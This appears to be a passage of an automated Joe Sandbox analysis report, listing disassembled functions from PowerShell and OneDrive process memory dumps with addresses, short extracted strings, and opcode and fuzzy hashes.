                    • Opcode ID: 6616c1aeb2d886f51a4c57b63fdadca7fede8b0036ea81bfd9326c4f3ea4a694
                    • Instruction ID: 5db5143edc71121fd90db703bb7f821945828675b7361e27d0ecc6dc23e603c5
                    • Opcode Fuzzy Hash: 6616c1aeb2d886f51a4c57b63fdadca7fede8b0036ea81bfd9326c4f3ea4a694
                    • Instruction Fuzzy Hash: 2E81D121E4DA8A8BE7A5DF68946527C7AF2FF02794B5801BEC40DDB0C3DE18AC05C381
                    Function 00007FF887C0647B Relevance: 1.4, Strings: 1, Instructions: 170COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1682170430.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ff887c00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: bv
                    • API String ID: 0-1878758691
                    • Opcode ID: 189f8d6114ea6c5f5e2b94b01d6073ba3bc53a31dfce63afc0979871f9488f83
                    • Instruction ID: 5e61f3168141cd34961a9a4625ee2aa9d1ef8ee9cd2df732862418efe1498d80
                    • Opcode Fuzzy Hash: 189f8d6114ea6c5f5e2b94b01d6073ba3bc53a31dfce63afc0979871f9488f83
                    • Instruction Fuzzy Hash: 7D410631E4DA898FEB56DB6894606B97BB2FF46350B1801FBC04DDB193DA1CA805C391
                    Function 00007FF887A1EFE0 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1680162248.00007FF887A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A1D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ff887a1d000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: xr}
                    • API String ID: 0-952569658
                    • Opcode ID: 2fa28ac42d40be28aee23ca808912277c9131c14db1b7b9bcf63ed81e9ec9245
                    • Instruction ID: 193db87537fe8b47f7a9fb6b33c0f73db41a43528071e7049de6a3030d4729b4
                    • Opcode Fuzzy Hash: 2fa28ac42d40be28aee23ca808912277c9131c14db1b7b9bcf63ed81e9ec9245
                    • Instruction Fuzzy Hash: 8C41297080EBC44FE7569B389846A563FF0FF57360B1901DFD088CB1A7D625A846C7A2
                    Function 00007FF887C06605 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1682170430.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ff887c00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: bv
                    • API String ID: 0-1878758691
                    • Opcode ID: 1d9170020c7aa5024ddc806f7d9f7e5c2de3d78e2b274569030662136e1fe2d5
                    • Instruction ID: e3121e2a73e715baf946375d35eefa05266377c5153a57f250cd9c5efbaa7c4b
                    • Opcode Fuzzy Hash: 1d9170020c7aa5024ddc806f7d9f7e5c2de3d78e2b274569030662136e1fe2d5
                    • Instruction Fuzzy Hash: 2F31CF71E4EBD58FEB56CBA894601B97BB1EF07750B1901FBC089DB093CA1C5846C392
                    Function 00007FF887B39738 Relevance: .2, Instructions: 156COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1681238532.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ff887b30000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8d4df64bcf88587f4fdf61699769c08591b4839eadec3bbcef2261bb2b55bb3a
                    • Instruction ID: 646cb150bbadd9a3dfdab33d455cd454b5888733a96ca2a40dae34a243c3386c
                    • Opcode Fuzzy Hash: 8d4df64bcf88587f4fdf61699769c08591b4839eadec3bbcef2261bb2b55bb3a
                    • Instruction Fuzzy Hash: 1441E931D0CA899FE719DA5C68066BD7BE1FBA5711F14417FE04993282DB20A85ACBC2
                    Function 00007FF887B3A49C Relevance: .1, Instructions: 101COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1681238532.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ff887b30000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f855ab36bd1642dfb8070f23196593014d290ef09adafd6d579ae2800a8347c4
                    • Instruction ID: b1794b643661fa8d9180a95777ca1c7e8ad1e732ba15051d98bef3b47e6c3fff
                    • Opcode Fuzzy Hash: f855ab36bd1642dfb8070f23196593014d290ef09adafd6d579ae2800a8347c4
                    • Instruction Fuzzy Hash: 3C210A3190C74C4FDB59DF9C9C4A7E97BF0EB56321F00416BD049C3152DA74A85ACB91
                    Function 00007FF887B333B5 Relevance: .0, Instructions: 49COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1681238532.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ff887b30000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                    • Instruction ID: 4b87c7a2925cab0916395990dd5a602cba74e19dd1bc504da5f8eba151e5aabd
                    • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                    • Instruction Fuzzy Hash: E201677115CB0D4FDB48EF0CE451AAAB7E0FB99364F10056DE58AC3651DA36E882CB46
                    Function 00007FF887C0414D Relevance: .0, Instructions: 37COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1682170430.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ff887c00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7187676d2be18ea4b4820150a5642b8c56d21208a6f9c70b3e5f5a4b02933a59
                    • Instruction ID: 64b270deeb08e0f9a427c3e60344af07eeefe1b539f72403df67409beab5f764
                    • Opcode Fuzzy Hash: 7187676d2be18ea4b4820150a5642b8c56d21208a6f9c70b3e5f5a4b02933a59
                    • Instruction Fuzzy Hash: 33F09A32A4C9448FD768EA4CE4404E873E1FF5536072100BAE02DC71A3CA2AEC40C781
                    Function 00007FF887B3A0FB Relevance: .0, Instructions: 37COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1681238532.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ff887b30000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3cc268efb5cfe65a0ffa3269406017722ee3ebd5cf91272ee2e25016c3c9c809
                    • Instruction ID: 4e90134f6d201129508251c9e79e8323f9db792649517e5ac6ecf376054898e9
                    • Opcode Fuzzy Hash: 3cc268efb5cfe65a0ffa3269406017722ee3ebd5cf91272ee2e25016c3c9c809
                    • Instruction Fuzzy Hash: DDF0963248CA8E4FDB86EF189C554E97FA0FF56215B1902B7E44CC7063EB215958C782
                    Function 00007FF887C04400 Relevance: .0, Instructions: 35COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1682170430.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ff887c00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c04b33b4b6c84fdda36ae9257084f27eaaef74bd5425a5ffb6fb7400b7474636
                    • Instruction ID: 73c9b0e597e360f2a8339c3c37cb0331a0ff42f77770b1747fcdccbfaeb747e1
                    • Opcode Fuzzy Hash: c04b33b4b6c84fdda36ae9257084f27eaaef74bd5425a5ffb6fb7400b7474636
                    • Instruction Fuzzy Hash: ACF0B832A4C9448FE758EB8CE4408AC73F1FF06362B1100F6E019CB1A3CA2AAC40C780

                    Non-executed Functions

                    Function 00007FF887B385FA Relevance: 5.2, Strings: 4, Instructions: 165COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1681238532.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ff887b30000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: K_^$K_^$K_^$K_^
                    • API String ID: 0-3666970850
                    • Opcode ID: b8e2b975600fed549ed372452d499187852b7cfc4178134b3652f2589577a44c
                    • Instruction ID: daec9f1ce12eb8c6dbafde5407782246ad6d9ad6c386d32d116037fe96711654
                    • Opcode Fuzzy Hash: b8e2b975600fed549ed372452d499187852b7cfc4178134b3652f2589577a44c
                    • Instruction Fuzzy Hash: 2651B672D4C6C75FE753967C58991E93FE2FF52294B0E00F6C0988B093EE196886C362
                    Function 00007FF887B38BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1681238532.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ff887b30000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: K_^4$K_^7$K_^F$K_^J
                    • API String ID: 0-377281160
                    • Opcode ID: 1337c1854dd59eb83ea9a8eb30e63dcf3290b25af5210be026440cbc330f0a7a
                    • Instruction ID: aec026dcd16201245b71d164863561d43e2eff9d8da581b550697b553bf90853
                    • Opcode Fuzzy Hash: 1337c1854dd59eb83ea9a8eb30e63dcf3290b25af5210be026440cbc330f0a7a
                    • Instruction Fuzzy Hash: B2215E7761C52A5EDB11BFBCB8446D93BA0EF982B434502B3D19CDB013EE18708786D1

                    Executed Functions

                    Function 00007FF887B012B9 Relevance: 10.8, Strings: 8, Instructions: 848COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.2002241417.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_7ff887b00000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID: 6y$6y$6y$6y$O_H$"ry$/y$/y
                    • API String ID: 0-843119707
                    • Opcode ID: 7ef5a9eee64fe9d029bfe2926ef843c2dc6f4b95105220ac522ed9fd1ba9ae87
                    • Instruction ID: 21d9a9e093805079152593d44e95f2cd6653f4dc5943ca293ccacb2034cef65b
                    • Opcode Fuzzy Hash: 7ef5a9eee64fe9d029bfe2926ef843c2dc6f4b95105220ac522ed9fd1ba9ae87
                    • Instruction Fuzzy Hash: AB427431F28A498FE799EB6884597BD77E2FF98740F4405B9D00DD32D6DE2CA8418742
                    Function 00007FF887B01CDD Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.2002241417.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_7ff887b00000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID: r6y
                    • API String ID: 0-3142403458
                    • Opcode ID: 36a4d0f4e0679f3befb7a76b02b0dc7eb22a7dc4f7c7d1d440e6a38b95562426
                    • Instruction ID: 0f17b0372b3ee43dee793b9d41fe3d09564128f2516bf69c372d995139484a52
                    • Opcode Fuzzy Hash: 36a4d0f4e0679f3befb7a76b02b0dc7eb22a7dc4f7c7d1d440e6a38b95562426
                    • Instruction Fuzzy Hash: 6A51E020A5D6C98FD78AAB78582437A7FE5EF87255B0805FBE08DC72E3DD185846C342
                    Function 00007FF887B004E5 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.2002241417.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_7ff887b00000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID: r6y
                    • API String ID: 0-3142403458
                    • Opcode ID: 68a1ce84a5304510d8a53a4efa023e4e0be0a4f6d916280e8f7cb0f9980202d0
                    • Instruction ID: 4e94c48acdaf2c92bcbdfa02c8b571548682d610b2d52552d4147f5524648a16
                    • Opcode Fuzzy Hash: 68a1ce84a5304510d8a53a4efa023e4e0be0a4f6d916280e8f7cb0f9980202d0
                    • Instruction Fuzzy Hash: F471E222B1CA8A4FE654AA6CA4553FC77D1FFC5365B0806BBE14CCB293DD189C4A8391
                    Function 00007FF887B004E0 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.2002241417.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_7ff887b00000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID: r6y
                    • API String ID: 0-3142403458
                    • Opcode ID: d7abeb3a07f7d0f615efb8ca2854b656fc24a1a9c669a514e7fc8a34b3342182
                    • Instruction ID: 59d4eae0eaaab3d05b79801c7e6782635c328d909122c3c979ef473e827ae88e
                    • Opcode Fuzzy Hash: d7abeb3a07f7d0f615efb8ca2854b656fc24a1a9c669a514e7fc8a34b3342182
                    • Instruction Fuzzy Hash: 8F31A221B2894D4FE698EB6C945937DA6D2FFD9751F4405BAE00EC32D3DD289C418741
                    Function 00007FF887B00AC1 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.2002241417.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_7ff887b00000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID: 6y
                    • API String ID: 0-1547487790
                    • Opcode ID: bcb9b764cfb7265dc2c9b11a38c5d010aec618f7951caeb61a76ad1cd186df3a
                    • Instruction ID: 27512e33ac69baffc5ba643eafca30979b47cd2d110bd45fe0bfd6dc81cf3a68
                    • Opcode Fuzzy Hash: bcb9b764cfb7265dc2c9b11a38c5d010aec618f7951caeb61a76ad1cd186df3a
                    • Instruction Fuzzy Hash: BA31B221F1C9494FEB84B7AC585A3BD77E2FFA9651F4442B6E00DC7293DE2C58418352
                    Function 00007FF887B00C2E Relevance: .8, Instructions: 768COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000013.00000002.2002241417.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_7ff887b00000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 757aa7c57ed36a69aa7aa4f79429900d82cd1c843de524646c88b207eb988bb2
                    • Instruction ID: c49043cf9a79888c9837e6a69d6c67119fb77a6eca4bd61648f513e1b03c8a84
                    • Opcode Fuzzy Hash: 757aa7c57ed36a69aa7aa4f79429900d82cd1c843de524646c88b207eb988bb2
                    • Instruction Fuzzy Hash: 3791E131E1CA8A4FE796E76898652FD7BF2FF86250B0900BAD04DD7193DD2C6C468352
                    Function 00007FF887B00975 Relevance: .1, Instructions: 116COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000013.00000002.2002241417.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_7ff887b00000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3cf874d552b256277d2ab6bfa4626ba08f2a217763e76537e63d9c3dc2efe7c5
                    • Instruction ID: 89a9ca83339900da2386192940976d656969df88844a7740a99bc736c9275ac7
                    • Opcode Fuzzy Hash: 3cf874d552b256277d2ab6bfa4626ba08f2a217763e76537e63d9c3dc2efe7c5
                    • Instruction Fuzzy Hash: 40315C34E2890E8FEB84EBA8C4557ED77F2FFA8340F5045B9D009D3286DE29A8418741
                    Function 00007FF887B00868 Relevance: .1, Instructions: 76COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000013.00000002.2002241417.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_7ff887b00000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eb07f60a1312e87aa8cc38e6d094d49091c6f40dfc63085f0f824e8665d736fb
                    • Instruction ID: fc9ac560eedf0f8a42b0cbaf2b080ba528d901225dfae099781560289d66b3b3
                    • Opcode Fuzzy Hash: eb07f60a1312e87aa8cc38e6d094d49091c6f40dfc63085f0f824e8665d736fb
                    • Instruction Fuzzy Hash: 0C212C25E2854D9BD385FBAC80956E97BE1FB98304B8081E5E409C33DECE29A8508792
                    Function 00007FF887B01E91 Relevance: .0, Instructions: 45COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000013.00000002.2002241417.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_7ff887b00000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b0c6a418db4574e6d07492f05589b77de332fa5ede1110b0adc2bec6b6b8a2df
                    • Instruction ID: ecd57cb905ff52934f1d60dbfc71fe193e17dbc7215926bd0e1e5b0cd059b661
                    • Opcode Fuzzy Hash: b0c6a418db4574e6d07492f05589b77de332fa5ede1110b0adc2bec6b6b8a2df
                    • Instruction Fuzzy Hash: 6801262090C6848FD786A73C585447D7FF1EFD6280B0801EBD488CB19BDC18A985C382

                    Executed Functions

                    Function 00007FF887B012B9 Relevance: 10.8, Strings: 8, Instructions: 848COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000014.00000002.2108772548.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff887b00000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID: 6y$6y$6y$6y$O_H$"ry$/y$/y
                    • API String ID: 0-843119707
                    • Opcode ID: 42a464471ba942380e35936b10ed3ba33c3e588ea2bf7acc693a5ac2089a743e
                    • Instruction ID: a690eb7d1146e4f011e94776fdfaf328087722f11c3aeb68e3a1aec354b546ad
                    • Opcode Fuzzy Hash: 42a464471ba942380e35936b10ed3ba33c3e588ea2bf7acc693a5ac2089a743e
                    • Instruction Fuzzy Hash: 0F42C731B6CA494FE799EB6884697BD77F2FF98780F400579D00ED32D6DE28A8418742
                    Function 00007FF887B01CDD Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000014.00000002.2108772548.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff887b00000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID: r6y
                    • API String ID: 0-3142403458
                    • Opcode ID: 4b011d1b499da3d4f64176f942121c4059efe4011ef89485ea916e1aef14b1e5
                    • Instruction ID: bae227f87efa627f7d384e09c23470ba8a73b86dc0e6f00c6d0b9e1c5a88f12d
                    • Opcode Fuzzy Hash: 4b011d1b499da3d4f64176f942121c4059efe4011ef89485ea916e1aef14b1e5
                    • Instruction Fuzzy Hash: 5051E120A5D6C98FD78AAB78582437A7FE5EF87255B0805FBE08DC72E3DD185846C342
                    Function 00007FF887B004E5 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000014.00000002.2108772548.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff887b00000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID: r6y
                    • API String ID: 0-3142403458
                    • Opcode ID: c608dd1f62225df20b731b490db77dbe23b03664442cab05ed4fd83f88e733d8
                    • Instruction ID: e2a41a76cda5a6a4c2b317b465966f0e8fbf479d813a5905c8002c35cc7d5def
                    • Opcode Fuzzy Hash: c608dd1f62225df20b731b490db77dbe23b03664442cab05ed4fd83f88e733d8
                    • Instruction Fuzzy Hash: 7671E322B1CA8A4FE654AA6CA4553FC77D1FFC5365B0806BBE14CCB2D3DD189C4A8391
                    Function 00007FF887B004E0 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000014.00000002.2108772548.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff887b00000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID: r6y
                    • API String ID: 0-3142403458
                    • Opcode ID: b03c383b6dc6aa8b652d3d568f0918b235b3e791ea2cd6c8c07f28019c611fd6
                    • Instruction ID: f0534ecc8092f65b41fade7d60d64de96f8f9f2de12b58a841b3ce19db9659cc
                    • Opcode Fuzzy Hash: b03c383b6dc6aa8b652d3d568f0918b235b3e791ea2cd6c8c07f28019c611fd6
                    • Instruction Fuzzy Hash: AD31A221B2894D4FE698EB6C945937DA6D2FFD9751F4405BAE00EC32D3DD289C418741
                    Function 00007FF887B00AC1 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000014.00000002.2108772548.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff887b00000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID: 6y
                    • API String ID: 0-1547487790
                    • Opcode ID: bcb9b764cfb7265dc2c9b11a38c5d010aec618f7951caeb61a76ad1cd186df3a
                    • Instruction ID: 27512e33ac69baffc5ba643eafca30979b47cd2d110bd45fe0bfd6dc81cf3a68
                    • Opcode Fuzzy Hash: bcb9b764cfb7265dc2c9b11a38c5d010aec618f7951caeb61a76ad1cd186df3a
                    • Instruction Fuzzy Hash: BA31B221F1C9494FEB84B7AC585A3BD77E2FFA9651F4442B6E00DC7293DE2C58418352
                    Function 00007FF887B00C2E Relevance: .8, Instructions: 768COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2108772548.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff887b00000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 700b398e605e10dc5cb56df2da5c5ca7a888ab307814bf42c1d547aed582f981
                    • Instruction ID: d07cc4d159f49abf91ee55c3a03af07dbf196f4f69b7c75afb784dd6df2c9463
                    • Opcode Fuzzy Hash: 700b398e605e10dc5cb56df2da5c5ca7a888ab307814bf42c1d547aed582f981
                    • Instruction Fuzzy Hash: BB91E331A1CA8A4FE796E76898652FD7BF2FF86250B0900BBD04DD7193DD1C6C468351
                    Function 00007FF887B00975 Relevance: .1, Instructions: 116COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2108772548.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff887b00000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c6a4fb302071fa21a8ba2c4852ed47fc195ccdd169d0db41540db516e3910965
                    • Instruction ID: 07f9000c1208af28d7ea43bbf27796e10d24fd7affceab158fc1d1340b754ef1
                    • Opcode Fuzzy Hash: c6a4fb302071fa21a8ba2c4852ed47fc195ccdd169d0db41540db516e3910965
                    • Instruction Fuzzy Hash: 92317F71A6890E8FEB85EBA8D4597ED7BB2FFA8340F500579D009D3286DE38A841C745
                    Function 00007FF887B00868 Relevance: .1, Instructions: 76COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2108772548.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff887b00000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 33063b641b90f858bad4a59f7064e252ad6c9b8dea7377971211d2ba541a6f80
                    • Instruction ID: fe525d38fd99423e737df7948a3dc1272c485593b83d41de8ea8edb07bb966f8
                    • Opcode Fuzzy Hash: 33063b641b90f858bad4a59f7064e252ad6c9b8dea7377971211d2ba541a6f80
                    • Instruction Fuzzy Hash: 47218171A6D50D5FD386EBA8C0996EA7F71FF98340B804565E409C37CECE2869408B96
                    Function 00007FF887B01E91 Relevance: .0, Instructions: 45COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000014.00000002.2108772548.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_7ff887b00000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3108a0c348a0632df13ba002ec53a484c345f473f7f7b6cb9ffa11ac01877f67
                    • Instruction ID: 8bbfe04c7e4e7e6bc35f666c42416ee201317d07f90b21d19ed232738bf95117
                    • Opcode Fuzzy Hash: 3108a0c348a0632df13ba002ec53a484c345f473f7f7b6cb9ffa11ac01877f67
                    • Instruction Fuzzy Hash: 0801492090C7844FD786A73C685447D7FF1EFD6280B0805EBD488CB1D7DC186985C382

                    Executed Functions

                    Function 00007FF887B012B9 Relevance: 10.8, Strings: 8, Instructions: 848COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2190244949.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff887b00000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID: 6y$6y$6y$6y$O_H$"ry$/y$/y
                    • API String ID: 0-843119707
                    • Opcode ID: 8945d866188ac800e16eff7ab9c19f4a1f64878eab3f7aad776a92eb02b3697f
                    • Instruction ID: 1236a1e7886a55646806dea793dc2af3a42df5d9e32587e40e7a35090ac55f1b
                    • Opcode Fuzzy Hash: 8945d866188ac800e16eff7ab9c19f4a1f64878eab3f7aad776a92eb02b3697f
                    • Instruction Fuzzy Hash: 5C42B531B6CA494FEB98EB6C94697BD77E2FF98740F400579D00ED32D2DE28A8418742
                    Function 00007FF887B01CDD Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2190244949.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff887b00000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID: r6y
                    • API String ID: 0-3142403458
                    • Opcode ID: 51af10d426d04f8266b6c348293f507c884fcc3cb136e44f14ef220ce7dc04d6
                    • Instruction ID: 27bd294008d4cfb2740cb46bb96a69c892604a5de4dfe3d7fbdb6502bb2f647c
                    • Opcode Fuzzy Hash: 51af10d426d04f8266b6c348293f507c884fcc3cb136e44f14ef220ce7dc04d6
                    • Instruction Fuzzy Hash: 2751E020A5D6C98FD78AAB78582437A7FE5EF87255B0805FBE08DC72E3DD185846C342
                    Function 00007FF887B004E5 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2190244949.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
